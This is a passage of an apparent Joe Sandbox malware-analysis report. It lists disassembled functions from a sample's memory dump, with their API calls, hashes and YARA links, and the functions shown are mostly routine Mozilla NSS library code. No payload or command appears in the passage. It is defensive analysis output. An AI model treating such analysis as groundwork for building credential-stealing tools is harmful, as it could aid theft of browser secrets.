                                                                                                                                                                                                              • Instruction ID: c483d9ec864d81d47e15ae2df980301ebd680cb4725645c2fa79b60c3e574e24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4ec73c8d084af738bca040cfe8478d754fad1efec9d07c3aafc1731d485a146
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D94146B0B80305FADB409F659C48A6ABBBCFB14B0AF10C429E506D7092EB34D6849F58
                                                                                                                                                                                                              Function 6CB8CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB8CC7B), ref: 6CB8CD7A
                                                                                                                                                                                                                • Part of subcall function 6CB8CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CAFC1A8,?), ref: 6CB8CE92
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CDA5
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CDB8
                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6CB8CDDB
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CD8E
                                                                                                                                                                                                                • Part of subcall function 6CAB05C0: PR_EnterMonitor.NSS3 ref: 6CAB05D1
                                                                                                                                                                                                                • Part of subcall function 6CAB05C0: PR_ExitMonitor.NSS3 ref: 6CAB05EA
                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB8CDE8
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CDFF
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CE16
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CE29
                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6CB8CE48
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                              • API String ID: 601260978-871931242
                                                                                                                                                                                                              • Opcode ID: 615eb0c5e8f5e9990229aadb385e214f0cbf6d691b87ff845e834622e6269161
                                                                                                                                                                                                              • Instruction ID: 1dce0224fe6deac0d08f92b235fd78fbca161ce2b5abb3700992da57cd0b5103
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 615eb0c5e8f5e9990229aadb385e214f0cbf6d691b87ff845e834622e6269161
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F11E4E9E131A056D7117639AE00D9E38ADDB4201EF184734E815E1F00FB25C94D83F2
                                                                                                                                                                                                              Function 6CBD1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CBD13BC,?,?,?,6CBD1193), ref: 6CBD1C6B
                                                                                                                                                                                                              • PR_NewLock.NSS3(?,6CBD1193), ref: 6CBD1C7E
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,6CBD1193), ref: 6CBD1C91
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CAB21BC), ref: 6CAABB8C
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,6CBD1193), ref: 6CBD1CA7
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAABBEB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAABBFB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: GetLastError.KERNEL32 ref: 6CAABC03
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAABC19
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: free.MOZGLUE(00000000), ref: 6CAABC22
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,6CBD1193), ref: 6CBD1CBE
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CBD1193), ref: 6CBD1CD4
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CBD1193), ref: 6CBD1CFE
                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D1A
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CAB1A48), ref: 6CB89BB3
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAB1A48), ref: 6CB89BC8
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D3D
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,6CBD1193), ref: 6CBD1D4E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D64
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CBD1193), ref: 6CBD1D6F
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CBD1193), ref: 6CBD1D7B
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CBD1193), ref: 6CBD1D87
                                                                                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CBD1193), ref: 6CBD1D93
                                                                                                                                                                                                              • PR_DestroyLock.NSS3(00000000,?,?,6CBD1193), ref: 6CBD1D9F
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,6CBD1193), ref: 6CBD1DA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3246495057-0
                                                                                                                                                                                                              • Opcode ID: 62686fe1e473d930204277129c242e4a0bfee66980d0307cc1e384d03d95ed67
                                                                                                                                                                                                              • Instruction ID: bf9bc831116d3563c3dfc56572265c78cf6b94167aab734dc4e5d0b0b61057a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62686fe1e473d930204277129c242e4a0bfee66980d0307cc1e384d03d95ed67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231EBF1E007515BEB219F65AC41A6B76F8EF0165DB084938E84A87F41F771F418CBA2
                                                                                                                                                                                                              Function 6CB25CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CB25EC0,00000000,?,?), ref: 6CB25CBE
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CB25CD7
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CB25CF0
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CB25D09
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CB25EC0,00000000,?,?), ref: 6CB25D1F
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CB25D3C
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB25D51
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB25D66
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CB25D80
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                              • API String ID: 1171493939-3017051476
                                                                                                                                                                                                              • Opcode ID: 5abd460c2a8425324c42f4a002fd094944b5d042ee2580338f4c161909bd155a
                                                                                                                                                                                                              • Instruction ID: 97911f8d2313e3f9e560fbaf209936316b09987c46351484639e5eeda0ad6024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5abd460c2a8425324c42f4a002fd094944b5d042ee2580338f4c161909bd155a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D3124B07413A16BE7015A288C49F763768EF022CAF100530FE9DE6A85F77AD419C39A
                                                                                                                                                                                                              Function 6CB26CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBF1DE0,?), ref: 6CB26CFE
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB26D26
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CB26D70
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6CB26D82
                                                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6CB26DA2
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB26DD8
                                                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CB26E60
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CB26F19
                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CB26F2D
                                                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CB26F7B
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB27011
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CB27033
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB2703F
                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CB27060
                                                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CB27087
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CB270AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                                                              • Opcode ID: 595c528834c35874f88961bfb86fbd98484bb9d5f008ecd5039347e4f32cfc25
                                                                                                                                                                                                              • Instruction ID: 00aad78b4506557ebeac57256e4ccb0912b8f9a2eafe5d82c262f0d2a41c6c42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 595c528834c35874f88961bfb86fbd98484bb9d5f008ecd5039347e4f32cfc25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44A1F6719182C09BEF109B24DC85BBB72A4EB8130CF244939E91CDBA85E77DD849C793
                                                                                                                                                                                                              Function 6CB3AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3ADB1
                                                                                                                                                                                                                • Part of subcall function 6CB1BE30: SECOID_FindOID_Util.NSS3(6CAD311B,00000000,?,6CAD311B,?), ref: 6CB1BE44
                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB3ADF4
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB3AE08
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB3AE25
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6CB3AE63
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB3AE4D
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3AE93
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB3AECC
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6CB3AEDE
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6CB3AEE6
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB3AEF5
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6CB3AF16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                              • API String ID: 3441714441-3315324353
                                                                                                                                                                                                              • Opcode ID: 3324f375ba9bc14b9b59bf3fea890c16630ec58daed121dcadbc4be53ed8d580
                                                                                                                                                                                                              • Instruction ID: 281c10c9a4382caebf97f95d13a06ae23902b107f690b89749ee0c82ced5f65b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3324f375ba9bc14b9b59bf3fea890c16630ec58daed121dcadbc4be53ed8d580
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41F7B68042B067EF115A589C45BBE32B8EF4271CF340525E85CD6FD1FB399A488AD3
                                                                                                                                                                                                              Function 6CB55CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52BF0
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C07
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C1E
                                                                                                                                                                                                                • Part of subcall function 6CB52BE0: free.MOZGLUE(?,00000000,00000000,?,6CB52A28,00000060,00000001), ref: 6CB52C4A
                                                                                                                                                                                                              • free.MOZGLUE(?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D0F
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D4E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D62
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D85
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55D99
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55DFA
                                                                                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55E33
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E3E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E47
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB580C1), ref: 6CB55E60
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CB5AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB55E78
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55EB9
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55EF0
                                                                                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55F3D
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB55F4B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4273776295-0
                                                                                                                                                                                                              • Opcode ID: c9818cdcbccc603536040bed8865bd45a8a01353dbb497e8661a0e845b76d5a6
                                                                                                                                                                                                              • Instruction ID: 72abb8befe8ee811bf065a1767a3cff7f5d54524e72d17b859055315df867328
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9818cdcbccc603536040bed8865bd45a8a01353dbb497e8661a0e845b76d5a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1471CEB5A00B409FD701CF24D885A96B3F5FF89309F148528E85E87B11EB31F969CB92
                                                                                                                                                                                                              Function 6CAD8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?), ref: 6CAD8E22
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD8E36
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8E4F
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,?,?,?), ref: 6CAD8E78
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAD8E9B
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAD8EAC
                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3(?,?), ref: 6CAD8EDE
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAD8EF0
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F00
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD8F0E
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CAD8F39
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F4A
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8F5B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAD8F72
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAD8F82
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1569127702-0
                                                                                                                                                                                                              • Opcode ID: fc0f3b3bdf4ed4276ec8958bb697ee91e139c28ac475bcd832607bf3e2da64ac
